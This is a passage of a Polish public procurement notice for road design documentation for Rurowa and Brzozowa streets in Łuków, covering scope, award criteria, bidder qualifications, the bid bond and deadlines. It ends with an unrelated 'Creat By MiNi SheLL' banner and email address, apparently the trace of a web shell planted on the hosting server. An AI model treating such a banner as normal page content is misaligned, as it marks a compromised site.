stałej organizacji ruchu – 5 egz. wersja papierowa + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg.<br/>6.8.	Dokumentacja winna być wykonana w formie pisemnej oraz dodatkowo w formie elektronicznej na nośniku CD/DVD.<br/>6.9.	Zamawiający zastrzega sobie przed złożeniem dokumentacji do uzgodnień ZUD, z gestorami sieci i wszelkich innych opinii przedłożenie rozwiązań projektowych celem ich omówienia. <br/>6.10.	Dokumentacje Wykonawca zobowiązany jest wykonać zgodnie z przepisami:<br/>6.10.1.	ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj.Dz. U. z 2021 r. poz. 2351 ze zm.);<br/>6.10.2.	Rozporządzenia Ministra Rozwoju w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia z dnia 11 września 2020 r. (Dz. U. z 2020 r. poz. 1609 z późn. zm.),<br/>6.10.3.	Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania kosztów prac projektowych oraz planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym <br/>(Dz.U. 2021 poz. 2458 ze zm.);<br/>6.10.4.	a także zgodnie z wszystkimi innymi przepisami i normami obowiązującymi na terenie Rzeczypospolitej Polskiej.<br/>6.11.	Wykonawca zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją zaprojektowanych robót budowlanych, w okresie ich realizacji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100333,26 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Część 2 Nazwa: Opracowanie dokumentacji technicznej na budowę ulicy Brzozowej w Łukowie<br/>Informacja o przewidywanych zamówieniach o których mowa w art. 214.<br/>10.1.	Przedmiotem zamówienia jest: opracowanie projektu budowlanego wg Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2020 poz. 1609 ze zm.) budowy ulicy Brzozowej o długości ok. 70 m w ramach zadania inwestycyjnego: „Opracowanie dokumentacji technicznej na budowę ul. Brzozowej w m. Łuków”. Przygotować należy niezbędne dokumenty, decyzje i opinie niezbędne do uzyskania decyzji zezwolenia na realizację inwestycji. Zadanie należy wykonać zgodnie z warunkami wydanymi przez Zarząd Dróg Miejskich w Łukowie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 14.1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>14.1.1.	nie podlegają wykluczeniu,<br/>14.1.2.	spełniają warunki udziału w postępowaniu.<br/>14.2.	Zamawiający wymaga wykazania przez wykonawców spełnienia warunków określonych w art. 112 ust. 2 ustawy Pzp, dotyczących:<br/>14.2.1.	zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.3.	sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.4.	zdolności technicznej lub zawodowej:<br/>a.	uzyskanie zamówienia mogą ubiegać się Wykonawcy posiadający doświadczenie polegające na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednego projektu budowlanego budowy, przebudowy, remontu drogi, ulicy.<br/>b.	O uzyskanie zamówienia mogą ubiegać się Wykonawcy dysponujący przynajmniej jedną osobą do pełnienia funkcji projektanta branży drogowej posiadającą uprawnienia budowlane do projektowania w specjalności drogowej nadane na podstawie, przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2021 r. poz. 2351) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/>Doświadczenie:<br/>wykonanie w okresie ostatnich 7 lat przed upływem terminu składania ofert jako projektant lub sprawdzający minimum 1 dokumentacji projektowej składającej się co najmniej z projektu budowlanego, dotyczącego budowy, przebudowy, remontu drogi, ulicy.<br/>Powyższy warunek dotyczy wszystkich części Zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">16.2.2.	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 ustawy (w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ. – załącznik nr 2 do SWZ. <br/>16.2.3.	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy (w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ. – załącznik nr 3 do SWZ. <br/>16.2.4.	w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 16.2.2, i 16.2.3 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji. <br/>16.2.5.	w przypadku o którym mowa w art. 117 ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy według wzoru stanowiącego załącznik do SWZ– załącznik nr 4 do SWZ.<br/>16.2.6.	w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu należy załączyć zobowiązanie podmiotu udostępniającego zasoby, stosownie do art. 118 ust. 3 Pzp według wzoru stanowiącego załącznik do SWZ. – załącznik nr 5 do SWZ.<br/>16.2.7.	W przypadku, polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, wykonawca przedstawia wraz z oświadczeniem, o którym mowa w pkt 16.2.2, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu. <br/>Uwaga: Powyższe dokumenty należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">16.3.	W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający będzie żądał poniższych środków dowodowych:<br/>a)	Wykazu usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; – załącznik nr 6 do SWZ.<br/>b)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami -załącznik nr 7 do SWZ.<br/>c)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp - załącznik nr 8 do SWZ,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 29.1.	Wykonawca jest zobowiązany do wniesienia wadium - w wysokości: <br/>29.1.1.	Część 1 Nazwa: Aktualizacja dokumentacji technicznej dla budowy ulicy Rurowej – <br/>1 000,00 zł ( słownie: jeden tysiąc złotych). <br/>29.1.2.	Część 2 Nazwa: Opracowanie dokumentacji technicznej na budowę ulicy Brzozowej w Łukowie -1 000,00 zł ( słownie: jeden tysiąc złotych). <br/>29.2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>29.3.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy: <br/>29.3.1.	pieniądzu, przelewem na rachunek bankowy: BANK SPÓŁDZIELCZY W TRZEBIESZOWIE Nr 84 9206 1048 7103 0300 2000 0160; z dopiskiem: (w zależności od części zamówienia na którą wnoszone będzie wadium): <br/>	Wadium na część 1 dokumentacja ul. Rurowa.<br/>lub<br/>	Wadium na część 2 dokumentacja ul. Brzozowa.<br/>29.3.2.	gwarancjach bankowych; <br/>29.3.3.	gwarancjach ubezpieczeniowych; <br/>29.3.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <br/>29.4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 29.3.2.–29.3.4. wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>29.5.	Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium. <br/>29.6.	Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu - dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że co innego wynika z przepisów prawa. <br/>29.7.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 29.3.1. rachunek bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert. <br/>29.8.	Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem. <br/>29.9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 P.z.p. <br/>29.10.	Zamawiający zatrzyma wadium na zasadach określonych w art. 98 ust. 6 P.z.p. <br/>29.11.	W przypadku gwarancji bankowej lub ubezpieczeniowej zabezpieczającej ofertę konsorcjum wystarczające jest rodzajowe oznaczenie współwykonawców. <br/>29.12.	Dopuszczalne jest również wniesienie wadium w postaci gwarancji, w której jako zleceniodawcę wskazano tylko jednego ze współwykonawców, w takim przypadku w treści gwarancji winno być wskazanie, że „przyczyny leżące po stronie wykonawcy” (art. 98 ust. 6 pkt 1 i 3 Pzp) obejmują również działania i zaniechania ewentualnych i nieznanych gwarantowi współwykonawców. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dokona zmian umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie i na warunkach wskazanych w art. 455 ustawy PZP, ze szczególnym uwzględnieniem zmian wskazanych poniżej:<br/>1)	zmiana terminu realizacji przedmiotu umowy na skutek:<br/>a)	zaistnienia siły wyższej,<br/>b)	zwłoki bądź odmowy organu w wydaniu decyzji, opinii, postanowień lub innych aktów administracyjnych,<br/>c)	konieczności zaspokojenia oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nieartykułowanych lub niemożliwych do jednoznacznego określenia w chwili zawierania umowy,<br/>d)	wystąpienia nieprzewidzianych prac archeologicznych,<br/>e)	przestojów lub opóźnień spowodowanych przez Zamawiającego,<br/>f)	zmiany przepisów prawa istotnych dla realizacji przedmiotu umowy,<br/>g)	polecenia przez Zamawiającego dokonania zmian w uzgodnionych wcześniej rozwiązaniach projektowych,<br/>h)	warunków atmosferycznych, które nie pozwoliły na sporządzenie materiałów przedprojektowych (np. inwentaryzacji, mapy, opracowań geodezyjnych, geologicznych i geotechnicznych), które trwały powyżej 5 dni roboczych – o ile Wykonawca zgłosił fakt wystąpienia powyższej przesłanki Zamawiającemu w terminie 10 dni od dnia jej zaistnienia,<br/>i)	rezygnacji przez Zamawiającego z realizacji części przedmiotu zamówienia z powodu zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,<br/>j)	zmiany uzasadnione okolicznościami, o których mowa w art. 3571 KC,<br/>k)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy, a zmiana zostanie dokonana w niezbędnym zakresie, wynikającym z tej okoliczności.<br/>2.	Zmiany, o których mowa w ust. 1, wymagają pod rygorem nieważności formy pisemnej w postaci aneksu do umowy, po udokumentowaniu przez Wykonawcę zaistnienia sytuacji, o której mowa powyżej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/um.lukow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-09 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com